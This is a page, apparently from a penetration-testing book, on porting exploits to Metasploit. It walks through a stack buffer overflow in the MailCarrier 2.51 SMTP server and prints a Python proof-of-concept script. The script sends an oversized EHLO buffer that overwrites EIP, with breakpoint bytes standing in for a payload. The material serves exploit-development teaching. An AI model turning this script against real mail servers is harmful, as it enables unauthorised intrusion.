Porting Exploits to the Metasploit Framework
217
But this is an older exploit, originally written for Windows 2000. When
you run it now, it doesn’t work quite as you’d expect. Conveniently, a Meta-
sploit module is already in the Framework to implement this exploit, although
it could use some improvement. After a little time investigating with varying
buffer lengths, you will find that more than 1000 bytes are available for
shellcode, and the buffer length needs to be adjusted by 4 bytes. (For more
information on how this is accomplished, read “Exploit Writing Tutorial
Part 1: Stack Based Overflows,” at
http://www.exploit-db.com/download_pdf/
13535/
.) The new proof of concept for this exploit follows: We have
removed the shellcode and replaced the jump instruction with a string
(
AAAA
) to overwrite the EIP register. (Proof of concept exploits contain the
basic code necessary to demonstrate the exploit but do not carry an actual
payload, and in many cases they require heavy modifications before they will
work properly.)
#!/usr/bin/python
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use Mail Server.
#
# 23 Oct 2004 - muts #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "\n\n###############################################"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41" * 5093
buffer += "\42" * 4
buffer += "\x90" * 32
buffer += "\xcc" * 1000
try:
print "\nSending evil buffer..."
s.connect(('192.168.1.155',25))
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone!"
except:
print "Could not connect to SMTP!"
As you might imagine, the easiest and fastest way to port a stand-alone
exploit to Metasploit is to modify a similar one from the Framework. And
that’s what we’ll do next.